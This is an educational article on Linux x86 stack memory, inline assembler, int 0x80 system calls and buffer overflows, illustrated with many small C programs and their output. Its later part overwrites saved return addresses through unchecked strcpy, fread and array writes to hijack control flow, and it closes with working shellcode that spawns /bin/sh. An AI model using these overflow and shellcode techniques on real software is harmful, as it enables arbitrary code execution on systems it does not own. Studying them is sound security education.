Stack Management – Buffer Overflow
- Linux
Security is one of the fastest-growing areas in information technology
management. Denial of service, buffer overflows and email viruses have become
everyday terms. Hardly a computer user anywhere has escaped these and other
attacks. As a result, a great deal of emphasis is now placed on securing
computer systems against intruders and viruses, because the effects of these
attacks can be drastic and sometimes irreparable.
In our papers, we set out to demystify these grave attacks from the coder's
point of view. Our belief is that to understand these attacks, one needs to be
in the shoes of the hackers/crackers. And mind you, every hacker/cracker is a
born programmer. We assume that you are well versed in the basics of the C
programming language. Nevertheless, we will revise some basic concepts and
learn assembler along the way. We could go on and on, but we'd rather stop
here and start hacking.
We start our journey with the buffer overflow vulnerability.
A buffer overflow is, literally, an overflow of a buffer. Every program is
allocated some space, a buffer area, in which it can write. A buffer overflow
occurs when the program spills over this buffer and writes into an area it is
not supposed to touch. This allows an intruder to overwrite whatever is stored
in that area and thereby gain control over the program and, in the worst case,
the system. However, before we look at the mechanism of this attack, we need
to be well versed in memory management and a few concepts of the stack and
heap memory areas.
Stack Memory
The programs given below analyse how memory is allocated to functions while a
program runs.
a1.c
main()
{
abc(1,2);
pqr(3,4);
xyz(5,6);
abc(7,8);
}
abc(int i, int j)
{
printf("%p %p abc\n",&i,&j);
}
pqr(int x, int y)
{
printf("%p %p pqr\n",&x,&y);
}
xyz(int i, int j)
{
printf("%p %p xyz\n",&i,&j);
}
gcc -o a1 a1.c
./a1
Output
0xbffff900 0xbffff904 abc
0xbffff900 0xbffff904 pqr
0xbffff900 0xbffff904 xyz
0xbffff900 0xbffff904 abc
At first glance the above program may seem simplistic, but it is our first cut
at learning internals. We call three functions, abc, pqr and xyz, with two
parameters each. The parameters of abc and xyz are named i and j; those of pqr
are named x and y.
The program simply displays the addresses of the parameters in each function.
What is noteworthy here is that all the functions display the same addresses
for their parameters. Thus, it can be safely stated that the parameters of
each function begin at the same place in memory. As in, parameters i and j of
function abc have been allocated the same memory locations as x and y of
function pqr.
Thus, when functions are called one after another from the same place, the
memory allocated for their parameters is the same. Meaning to say, there is no
permanent memory allocated for function parameters.
a1.c
main()
{
abc();
pqr();
xyz();
abc();
}
abc()
{
int i,j;
printf("%p %p abc\n",&i,&j);
}
pqr()
{
int k,l;
printf("%p %p pqr\n",&k,&l);
}
xyz()
{
int i,j;
printf("%p %p xyz\n",&i,&j);
}
Output
0xbfffe004 0xbfffe000 abc
0xbfffe004 0xbfffe000 pqr
0xbfffe004 0xbfffe000 xyz
0xbfffe004 0xbfffe000 abc
This example is a slightly modified version of the previous one. The functions
abc, pqr and xyz remain, but they do not accept parameters anymore. Instead,
variables are created within these functions. Nevertheless, like before, all
the printfs display identical addresses. This reinforces the belief that local
variables in a function are allocated the same addresses each time a function
is called.
The technicality here is that when a function exits, all the memory allocated
to it is given to the next function to be called. Thus, functions are given
transient memory, as in, the memory allocated to one is reused by another.
Also, variable names have no meaning at this level; it is the addresses
assigned to these variables that matter.
a1.c
main()
{
abc(1,2);
pqr(3,4);
xyz(5,6);
abc(7,8);
}
abc(int i1, int j1)
{
int i,j;
printf("i1=%p j1=%p i=%p j=%p abc\n",&i1, &j1 , &i,&j);
}
pqr(int k1 , int l1)
{
int k,l;
printf("k1=%p l1=%p k=%p l=%p pqr\n",&k1, &l1 , &k,&l);
}
xyz(int i1, int j1)
{
int i,j;
printf("i1=%p j1=%p i=%p j=%p xyz\n",&i1, &j1 , &i,&j);
}
Output
i1=0xbfffe180 j1=0xbfffe184 i=0xbfffe174 j=0xbfffe170 abc
k1=0xbfffe180 l1=0xbfffe184 k=0xbfffe174 l=0xbfffe170 pqr
i1=0xbfffe180 j1=0xbfffe184 i=0xbfffe174 j=0xbfffe170 xyz
i1=0xbfffe180 j1=0xbfffe184 i=0xbfffe174 j=0xbfffe170 abc
This program is a merger of the above two programs. The function names are the
same, but now each function not only accepts two parameters but also creates
two local variables on the stack. Printing out the addresses of the local
variables and the parameters brings no surprises at all. They all remain the
same for every function.
A detailed version follows.
The values 1 and 2 given to function abc are passed on to parameters i1 and
j1. These parameters take up some area in memory, which is called the stack.
The internals of stack memory will be explained in just a short while.
The parameters that are passed to a function are placed on the stack in
reverse order; therefore first 2 goes on the stack and then 1.
For the sake of understanding, let's take the actual values, where the stack
begins at memory location 0xbfffe188. The value 2 is pushed, or copied, on the
stack, which moves the stack pointer down to 0xbfffe184 and gives this address
to j1. It is followed by 1, which lands four bytes lower, i.e. at 0xbfffe180,
the address of i1. This is borne out by the program output, which shows these
very addresses for parameters i1 and j1.
Once the values are placed on the stack, the function code is executed. This
function, abc, creates two local variables i and j. As per the output, these
are created at positions 0xbfffe174 and 0xbfffe170. This goes to prove that
besides parameters, local variables also use up stack memory. The difference
of 12 bytes between the parameters and the variables is taken up by the
function call itself. We know why, but hang on, one concept at a time.
Now when the function exits, the stack resets to its original position of
0xbfffe188. A sure indication that someone moves the current memory pointer,
the stack pointer, up by 24 bytes. And the same process is repeated for all
function calls.
a1.c
main()
{
abc(1,2);
}
abc(int i1, int j1)
{
int i,j;
printf("i1=%p j1=%p i=%p j=%p abc\n",&i1, &j1 , &i,&j);
pqr(3,4);
}
pqr(int k1 , int l1)
{
int k,l;
printf("k1=%p l1=%p k=%p l=%p pqr\n",&k1, &l1 , &k,&l);
xyz(5,6);
aaa(8,9);
}
xyz(int i1, int j1)
{
int i,j;
printf("i1=%p j1=%p i=%p j=%p xyz\n",&i1, &j1 , &i,&j);
}
aaa(int i1, int j1)
{
int i,j;
printf("i1=%p j1=%p i=%p j=%p aaa\n",&i1, &j1 , &i,&j);
}
Output
i1=0xbfffe300 j1=0xbfffe304 i=0xbfffe2f4 j=0xbfffe2f0 abc
k1=0xbfffe2e0 l1=0xbfffe2e4 k=0xbfffe2d4 l=0xbfffe2d0 pqr
i1=0xbfffe2c0 j1=0xbfffe2c4 i=0xbfffe2b4 j=0xbfffe2b0 xyz
i1=0xbfffe2c0 j1=0xbfffe2c4 i=0xbfffe2b4 j=0xbfffe2b0 aaa
The above program reinforces the same principle: parameters and local
variables are created on the stack.
The entry point function main calls function abc. The stack memory now starts
at memory location 0xbfffe308, and the variables i and j are created at
0xbfffe2f4 and 0xbfffe2f0 respectively. There is a gap of 12 bytes, as seen
before.
At this point, the stack pointer is positioned at 0xbfffe2e8. When function
pqr is called from within abc, its parameters are pushed on the stack in
reverse order; therefore first 4 goes on the stack at 0xbfffe2e4 and then 3 at
0xbfffe2e0. These become the addresses of parameters l1 and k1 respectively.
After the same gap of 12 bytes, the variables k and l get the addresses
0xbfffe2d4 and 0xbfffe2d0 respectively.
The next two function calls, xyz and aaa, both show the same addresses. For
the call of function xyz from within function pqr, the stack is now at
0xbfffe2c8. The parameters 6 and 5 are pushed at 0xbfffe2c4 and 0xbfffe2c0
respectively. The variables i and j are then allocated 12 bytes further down,
and thus end up at 0xbfffe2b4 and 0xbfffe2b0. When this function ends, the
system moves the stack up by the same amount that it moved down. Therefore,
at the end of the call of xyz the stack is back at 0xbfffe2c8.
The call of the aaa function follows the same process, again bringing the
stack back to 0xbfffe2c8 in the end. And the same goes for function pqr. As a
result, at the end of each function, the stack moves back to where it was
before the function was called.
This theory can be tried out with any number of functions; each will see the
stack return to the position it started from. These functions in turn may call
as many functions as they like, and the same rules apply. At the end of a
function call, the stack moves up as much as it had moved down. Each one
cleans up its own mess.
a1.c
main()
{
int i,j;
i = 2;
j = 3;
printf("Address of i=%p j=%p\n",&i,&j);
abc(i,j);
printf("i=%d\n",i);
}
int abc(int x, int y)
{
int *z;
printf("Address of z=%p x=%p y=%p\n",&z,&x,&y);
z = &y;
printf("z=%p\n",z);
z++;z++;z++;z++;
printf("z=%p\n",z);
*z = 8;
}
Output
Address of i=0xbffff594 j=0xbffff590
Address of z=0xbffff574 x=0xbffff580 y=0xbffff584
z=0xbffff584
z=0xbffff594
i=8
This last example on the stack shows how dangerous stack manipulation can get.
The function main is the first function to be called, and in all other
respects it behaves like any other function when dealing with stack memory.
The local variables i and j in main are also created on the stack, at
0xbffff594 and 0xbffff590.
The call to function abc places the values 3 and 2 on the stack at locations
0xbffff584 and 0xbffff580, before taking up 12 bytes for itself. These are the
addresses of the parameters y and x. The pointer variable z is stored at
location 0xbffff574. This variable is initialized to the address of parameter
y, which is 0xbffff584. Thereafter, z is incremented four times, by 4 bytes
each time or 16 in all, hence its new value is 0xbffff594. But, if you
remember, this is the address occupied by variable i.
Further, using the pointer, a value of 8 is written to this location, thereby
actually changing the value of variable i. This is the power of pointers. One
pointer variable, if it wants, can indirectly overwrite the value of a
variable in another function. Since all local data is stored on the stack, it
is susceptible to being overwritten. Therefore, call someone else's function
with care.
Assembler code in C programs
The next series of programs explains assembler programming. We believe that
every programmer in the world should understand assembler. Unfortunately, our
view is not held by the majority. It does not matter which language you write
your code in; when it finally executes, it is the machine code produced from
assembler that runs and not your favorite language. We are not suggesting
that you write your code in assembler; all that we are saying is that using
assembler helps in understanding the internals of computing better.
A microprocessor contains small named storage areas called registers. These
registers are the basic building blocks that any assembler programmer works
with, and they are given names like eax, ebx etc.
Whenever we encounter the return statement in C, like 'return 100', two
things happen. One, the value 100 is placed in the eax register, and two, the
function ends and control goes back to the function that called it. The
caller assumes that any value returned by the called function will be found
in the eax register.
a1.c
main()
{
int i;
i=abc();
printf("%d\n",i);
}
int abc()
{
return 100;
}
a1.c
main()
{
int i;
i = abc();
printf("%d\n",i);
}
int abc()
{
__asm("mov $100,%eax");
}
Output
100
The gcc compiler allows us to embed assembler code in C. You are also allowed
to access variables defined in C from assembler. The assembler syntax looks
like a function call and takes the assembler instruction as a string. The
most common assembler instruction is called mov. It requires two operands, or
parameters. The first is the source and the second is the destination. As we
want to move the number 100 into the eax register, our source is the number
100. All numbers must be prefaced by a $ sign.
We remind you once again that a register is a named area in a microprocessor,
and all register names begin with a % sign. This assembler syntax was
invented by AT&T; if you are from the Windows world or the nasm world, the
operands are the other way around, i.e. mov destination, source.
The above program simulates the return statement by simply placing a value in
a register. The most common instruction is the mov instruction, which
normally makes up over 25% of any assembler program.
To place an assembler instruction in a C program, we enclose it in round
brackets after the keyword __asm. In the above program the instruction is
placed in function abc. When the function executes, it simply moves, or
copies, the value 100 into the eax register and then returns.
Coming back to function main, the value placed in the eax register is given
to variable i. Thus, the program neither knows nor cares whether it is the
return statement or a manual insertion of a value in the eax register that
has done the job.
a1.c
main()
{
__asm("pushl $10");
__asm("pushl $20");
abc();
}
int abc(int i , int j)
{
printf("%d %d\n", i , j);
}
Output
20 10
The pushl instruction pushes a value on the stack. In the Windows assembler
syntax the same instruction is written push.
a1.c
main()
{
__asm("pushl $10");
__asm("pushl $20");
abc();
abc();
}
int abc(int i , int j)
{
printf("%d %d\n", i , j);
}
Output
20 10
20 10
The next series of programs shows how a function call in C is converted to
assembler code. When a function is called, the parameters first get pushed on
the stack in reverse order. In assembler, it is the pushl instruction that is
used to push anything on the stack.
As a result, the C call abc(20,10); first pushes 10 on the stack using the
pushl $10 instruction, which is then followed by the pushl $20 instruction.
Thereafter the abc function is called in the normal C way, but with no
parameters.
Function abc is oblivious to the number of parameters it gets called with. All
that it assumes is that its parameters are present on the stack. It displays
their values and then returns to main. However, an error remains: the stack is
not restored to where it should be. We moved it down 8 bytes while supplying
the two parameters, so once the function call ends, it has to be moved back
up.
The next program repairs this glitch.
a1.c
main()
{
__asm("pushl $10");
__asm("pushl $20");
abc();
__asm("addl $8,%esp");
abc();
}
int abc(int i , int j)
{
printf("%d %d\n", i , j);
}
Output
20 10
1108544020 1073828704
The program amends the error by adding 8 to the stack pointer, which is held
in the esp register. It is the esp register that decides where the stack
starts in memory. If its value is 100, the stack is said to start at memory
location 100. With every push instruction, the stack moves down 4 bytes, i.e.
esp becomes 4 less.
The addl instruction takes the value to be added first and the register as the
second operand. Since the stack is restored to the position it had before the
function call, the error is gone. The second call to abc is made after the
parameters have been removed, so it prints whatever values happen to lie on
the stack at that point.
a1.c
main()
{
printf("esp=%x\n",esp());
__asm("pushl $10");
printf("esp=%x\n",esp());
__asm("pushl $20");
printf("esp=%x\n",esp());
abc();
printf("esp=%x\n",esp());
__asm("addl $8,%esp");
printf("esp=%x\n",esp());
}
int abc(int i , int j)
{
printf("%d %d\n", i , j);
}
int esp()
{
__asm("movl %esp,%eax");
}
Output
esp=bfffdd78
esp=bfffdd74
esp=bfffdd70
20 10
esp=bfffdd70
esp=bfffdd78
The above program has a newly added function called esp. This function simply
copies the value in the esp register to eax. This means that the return value
of the function is the current stack position. Before the first push, the
stack position is seen at bfffdd78, and after the pushl $10 instruction the
stack shows a value of bfffdd74, which is 4 less. Thus the stack has moved
down 4 bytes.
The second instruction, pushl $20, moves the stack further down to bfffdd70.
When function abc ends, the stack is at the same position, bfffdd70, which is
what it was before the function call. Only the addl instruction brings it back
to bfffdd78. These numbers confirm our explanation.
a1.c
int abc(int i , int j)
{
printf("%d %d\n", i , j);
}
main()
{
__asm("pushl $10\n\t"
"pushl $20\n\t"
"call abc\n\t"
"addl $8,%esp");
}
Output
20 10
All the assembly instructions are now placed in one asm block. Older versions
of gcc accepted a single string running across several lines, but that form
is deprecated, so each instruction is written here as its own string ending in
\n\t. A function call in C has its equivalent in assembler: the call
instruction. This instruction only requires the actual address of the function
to be called. In this program, instead of giving the address of the function,
we have given it the function name. The system internally replaces the name of
the function with its address.
The only rationale in placing the function abc before main is that the
compiler reads the file only once, from top to bottom. It is a single-pass
compiler and does not reread the C file. Hence, it needs a function name to be
created before it can be used.
a1.c
int abc(int i , int j)
{
printf("%d %d\n", i , j);
}
main()
{
printf("%p\n",abc);
}
Output
0x8048328
The name of a function in C represents the address of the function. Therefore,
the address of the abc function, when displayed, shows 0x8048328 (on our
machine).
a1.c
int abc(int i , int j)
{
printf("%d %d\n", i , j);
}
main()
{
__asm("pushl $10\n\t"
"pushl $20\n\t"
"call 0x8048328\n\t"
"addl $8,%esp");
}
Output
20 10
Once we know that the address of function abc is 0x8048328, we can give this
value to the call instruction directly, in place of the function name. The
next program instead places the value in the eax register and gives the
address to the call instruction through this register.
For the call instruction, the value given to it is where it assumes some
program code resides. Hence, it treats the bytes at that location as program
code and starts executing them. Just for your information, it is the job of
the compiler/linker to replace function names with actual addresses.
a1.c
int abc(int i , int j)
{
printf("%d %d\n", i , j);
}
main()
{
__asm("pushl $10\n\t"
"pushl $20\n\t"
"movl $0x8048328,%eax\n\t"
"call *%eax\n\t"
"addl $8,%esp");
}
Output
20 10
The call instruction can take a register as an operand. Using a * in front of
the register is optional, but the two forms, call *%eax and call %eax, cannot
both be used in one program; pick one of them.
a1.c
main()
{
int p = 6;
int q = 7;
printf("p=%p q=%p\n",&p,&q);
abc(3,4);
pqr();
}
int abc(int i , int j)
{
int x = 1;
int y = 2;
printf("i=%p j=%p\n",&i,&j);
printf("x=%p y=%p\n",&x,&y);
printf("abc %x %x %x %x %x %x %x\n");
}
int pqr()
{
printf("pqr %x %x %x %x %x %x %x\n");
}
Output
p=0xbfffee94 q=0xbfffee90
i=0xbfffee80 j=0xbfffee84
x=0xbfffee74 y=0xbfffee70
abc bfffee74 bfffee70 42015554 2 1 bfffee98 804836a
pqr 1 bfffee98 804836a 3 4 bfffee98 8048372
a1.c
main()
{
abc(10,20);
}
abc(int i , int j)
{
int p = 100;
int q = 200;
printf("i=%p j=%p p=%p q=%p\n",&i,&j,&p,&q);
__asm("movl $4,-4(%ebp)");
__asm("movl $3,-8(%ebp)");
__asm("movl $2,8(%ebp)");
__asm("movl $1,12(%ebp)");
printf("p=%d q=%d i=%d j=%d\n",p,q,i,j);
}
Output
i=0xbffff380 j=0xbffff384 p=0xbffff374 q=0xbffff370
p=4 q=3 i=2 j=1
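The round brackets stand for a * or indirection: -4(%ebp) is the memory at the
address in ebp minus 4. This is equivalent to the square brackets [] in the
Windows assembler syntax. As the output shows, the local variables p and q sit
at -4(%ebp) and -8(%ebp), and the parameters i and j at 8(%ebp) and 12(%ebp).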
a1.c
main()
{
char *argv[2] = {"/bin/sh",0};
execve("/bin/sh",argv,0);
printf("Bye\n");
}
To execute a program, we use the execve function. The first parameter is the
name of the program, in this case the Bourne shell, sh. The second is an array
of pointers to chars, or argv, and the third is an array of pointers to the
environment block. This function hands over control to the shell, and the
remaining statements in the file are never reached. As a result, the last
printf does not get executed. As always, the exit command at the shell prompt
quits the shell just created.
a1.c
main()
{
asm("nop");
}
The nop instruction does
nothing at all but yet is very useful for us.
a1.c
main()
{
printf("Main %p\n",main);
__asm("pushl $0x8048328");
__asm("ret");
}
a1.c
//pause
main()
{
__asm("mov $29,%eax");
__asm("int $0x80");
printf("Bye\n");
}
In the Windows world, code is always called from a dll or shared library. In
Linux and Unix, system calls are made. For this purpose, values are put in
registers and an interrupt is generated. For example, when a key is pressed on
the keyboard, the keyboard generates interrupt 9. Calling an interrupt demands
immediate attention from the microprocessor so that it can perform the task.
The above program aims at calling interrupt 80h. However, prior to that,
values have to be placed in registers, which in our case is the eax register.
These values are predecided and inform the OS of the task that needs to be
performed. A value of 29 indicates a pause.
First, the value 29 is moved into the eax register, and then interrupt 80h is
called using the int instruction. The program, when executed, simply waits
until it receives a signal, for instance when Ctrl-C is pressed. The string
Bye does not get displayed.
a1.c
//exit
main()
{
__asm("mov $1,%eax");
__asm("mov $4,%ebx");
__asm("int $0x80");
printf("Bye\n");
}
To quit a program, the exit function is frequently used. Internally this goes
through interrupt 80h with the value 1 in the eax register. The number 4 in
the ebx register is returned to the operating system, and it can be any number
for that matter. The above program mimics the function call. Thus, once again,
Bye does not get displayed.
a1.c
main()
{
printf("%d\n",getpid());
__asm("mov $2,%eax");
__asm("int $0x80");
printf("%d..\n",getpid());
}
Output
10313
10314..
10313..
Every program, when loaded in memory, gets a unique number or process id (pid)
by which it is known to the OS. The function getpid returns this process id.
In our case our program's pid is 10313. The fork function creates one more
process, a child, in memory. For this, the fork function puts 2 in the eax
register and calls int 80h. As a result, the last printf gets called twice,
once for the parent and once for the child. In both cases we print the pid,
and the output clearly shows that the child has been given a new pid of 10314.
a1.c
int i;
main()
{
asm("movl $20, %eax");
asm("int $0x80");
asm("movl %eax,i");
printf("Hi %d %d\n",i,getpid());
}
Output
Hi 15415 15415
Moving 20 into the eax register and calling int 80h is what the getpid
function is all about. The result of this interrupt is placed in the eax
register. In the program, the value in the eax register is moved into variable
i, which is then printed out. We are allowed to use C variables directly in
assembler code. Along with i, the getpid function is called again to prove
that the values are the same.
a1.c
main()
{
asm("int $0x80" : : "a"(2));
printf("Hi\n");
}
Output
Hi
Hi
There is a shorter form for the int 80h instruction. The instruction string
int $0x80 is followed by two colons. After the second colon come the names of
the registers in double inverted commas, along with the values that go in them
in round brackets. As a result, the value 2 in the above program gets placed
in the eax register and int 80h is called. This is the same as the fork call.
The printf function thus gets executed twice.
a1.c
main()
{
int i;
printf("pid=%d ppid=%d\n",getpid(),getppid());
asm("int $0x80" : "=a" (i) : "a" (2));
printf("Hi i=%d pid=%d ppid=%d\n",i,getpid(),getppid());
}
Output
pid=15445 ppid=15111
Hi i=0 pid=15446 ppid=15445
Hi i=15446 pid=15445 ppid=15111
The getppid function returns the parent's process id, which in our case is
that of the shell, 15111. Our program's pid is 15445. The int 80h instruction
has an =a after the first colon, which signifies that after int 80h is
executed, the return value in the eax register must be placed in the variable
specified in round brackets. Thus whatever follows the first colon is for
return values, and whatever follows the second colon is for values to be
placed in registers. The output shows both sides of the fork: the child sees
i=0, while the parent sees the child's pid, 15446.
a1.c
main()
{
kill(1066,9);
}
The ps -e command gives a list of programs with their process ids. The kill
function sends a signal to a running process. The first parameter is the
process id, here 1066, and the second is the number of the signal to be sent,
here 9. A signal of 9 terminates a program.
a1.c
main()
{
asm("int $0x80" : : "a" (37),"b" (1066), "c" (9));
}
In assembler, the function
is represented by a value of 37 in the eax register, the pid in the ebx
register and the signal 9 in the ecx register.
//mkdir vmci
a1.c
main()
{
char *p = "vmci";
asm("int $0x80" : : "a" (39), "b" (p));
}
The value 39 creates a subdirectory. Here, the ebx register holds the name of
the directory to be created, which in our case is given by pointer p.
a1.c
main()
{
char *p = "hel\nlo";
asm("int $0x80" : : "a" (4) , "b" (1) , "c" (p) , "d" (5));
}
Output
hel
l
The printf function finally calls the write system call. This is done by
placing 4 in the eax register. The ebx register holds the file handle to write
to, in our case 1, the standard output; ecx holds the string to write and edx
the number of characters to write, 5. Thus hel, the \n and one more l get
written on screen. The last o is ignored.
a1.c
main()
{
abc();
}
int abc()
{
char a[3];
strcpy(a,"AAAAAAAAAAAAAAAAAAAAAAAABBBBCDEF");
}
There is more than one way to skin a cat. This program takes a different
approach to overwriting the return address. As the array a is the first and
only variable, the return address is placed a few bytes above it. The strcpy
function does no bounds checking on the size of the array; thus it overwrites
the return address with the characters copied into the array.
a1.c
main()
{
abc();
}
int abc()
{
char a[3];
a[24]='B';
a[25]='B';
a[26]='B';
a[27]='B';
a[28]='C';
a[29]='D';
a[30]='E';
a[31]='F';
}
This is one more program to establish that array accesses are not restricted
to the size the array was declared with. Since a merely names a location in
memory, the array syntax can easily reach other areas in memory. While doing
some research on this topic, we found out that the gcc compiler adds padding
of its own around the array. Thus the return address is found at locations 28,
29, 30 and 31.
z.c
#include <stdio.h>
main()
{
FILE *fp; int i;
fp = fopen("q10.txt","w");
for ( i = 0 ; i<= 7 ; i++)
fputc('A',fp);
fputc('B',fp);
fputc('B',fp);
fputc('B',fp);
fputc('B',fp);
fputc('C',fp);
fputc('D',fp);
fputc('E',fp);
fputc('F',fp);
}
A file called q10.txt is
opened for writing. Using the function fputc, which takes a character and the
file pointer, 8 A’s are written on to disk using the for loop. Thereafter, a
few more characters are written individually to the file.
z1.c
#include <stdio.h>
main()
{
FILE *fp;char a[4];
fp = fopen("q10.txt","r");
fread(a,100,1,fp);
}
The above program is a sequel to the previous one. It opens the file q10.txt
and asks fread for 100 bytes to be read into the array a. However, only 4
bytes are allocated to the array. Thus the first 4 A’s are saved in the memory
allocated to the array, and the remaining characters overwrite the stack area
beyond it. The fread function places all these bytes on the stack in one go,
without realizing that it is overwriting existing data, thus causing a buffer
overflow.
>export VIJAY=`perl -e 'print "A" x 200'`
a1.c
main()
{
char *p;
p = getenv("VIJAY");
printf("%s\n",p);
}
Output
lots of A's
a1.c
main()
{
char *p;char a[64];
p = getenv("VIJAY");
strcpy(a,p);
}
This program ends with a segmentation fault, since the saved registers and the
return address on the stack have been overwritten.
a1.c
int pqr()
{
printf("In pqr\n\n");
exit(1);
}
main()
{
printf("pqr=%p\n",pqr);
abc();
}
int abc()
{
char a[3];
a[24]='B';
a[25]='B';
a[26]='B';
a[27]='B';
a[28]=0x5c;
a[29]=0x83;
a[30]=0x04;
a[31]=0x08;
}
Output
pqr=0x804835c
In pqr
Disassembled output
>gdb a1
x/12b 0x8048338
0xb8 0x01 0x00 0x00 0x00 0xcd 0x80
Before calling function abc in main, we run the program as is to find out the
address of function pqr. On our machine the address is 0x804835c. This value
is then written in abc to memory locations 28, 29, 30 and 31 of the array,
lowest byte first. As seen in the earlier program, these locations store the
return address, i.e. the address of the code to be executed when abc ends. Now
that it has been overwritten with the address of function pqr, pqr is called,
and hence we see the printf displaying In pqr.
The exit call in the pqr function has been shown in disassembled form using
the gdb debugger. Here 1 is moved into the eax register and then interrupt 80h
is called.
a1.c
main()
{
__asm("mov $1,%eax");
__asm("int $0x80");
printf("Bye\n");
}
The disassembled output of
this program shows the assembler instruction for the exit function. These
instructions are then placed into an array in the next program.
a1.c
char p[] = "\xb8\x01\x00\x00\x00\xcd\x80";
main()
{
char (*q)();
q = p;
printf("Hi\n");
q();
printf("Bye\n");
}
Output
Hi
The array p holds the machine code for the exit function. q is a pointer to a
function and is initialized to array p. On executing the program, the printf
function displays Hi. Thereafter, the code at the address held in q is
executed. Since this code represents the exit function, the program terminates
without displaying Bye.
a1.c
char p[] =
"\xeb\x1d" /* jmp callz */
/* start: */
"\x5e" /* popl %esi */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x07" /*
movb %al, 0x07(%esi) */
"\x89\x46\x0c" /*
movl %eax, 0x0c(%esi) */
"\x89\x76\x08" /*
movl %esi, 0x08(%esi) */
"\xb0\x0b" /* movb $0x0b, %al */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x08" /*
leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c" /*
leal 0x0c(%ebx), %edx */
"\xcd\x80" /* int $0x80 */
"\x29\xc0" /* subl %eax, %eax */
"\x40" /* incl %eax */
"\xcd\x80" /* int $0x80 */
/* callz: */
"\xe8\xde\xff\xff\xff"
/*call start*/
"/bin/sh";
main()
{
char (*q)();
q = p;
q();
}
This program works on the
same principles and creates a shell.